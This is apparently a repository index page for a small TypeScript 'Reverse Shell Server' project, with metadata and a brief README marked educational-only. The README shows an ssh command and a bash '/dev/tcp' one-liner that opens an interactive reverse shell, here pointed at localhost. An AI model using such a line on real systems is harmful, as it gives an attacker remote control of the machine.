https://github.com/hydro-dev/reverse-shell
https://github.com/hydro-dev/reverse-shell
Last synced: 4 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/hydro-dev/reverse-shell
- Owner: hydro-dev
- Created: 2025-05-14T10:10:17.000Z (9 months ago)
- Default Branch: master
- Last Pushed: 2025-10-25T07:48:18.000Z (4 months ago)
- Last Synced: 2025-10-25T09:23:14.256Z (4 months ago)
- Language: TypeScript
- Size: 19.5 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Reverse Shell Server
DISCLAIMER: This application is for educational purposes ONLY.
Not yet ready for production use.
```
ssh user@127.0.0.1 -p 13336
```
```
/bin/bash -c "/bin/bash -i >/dev/tcp/127.0.0.1/13335 0>&1"
```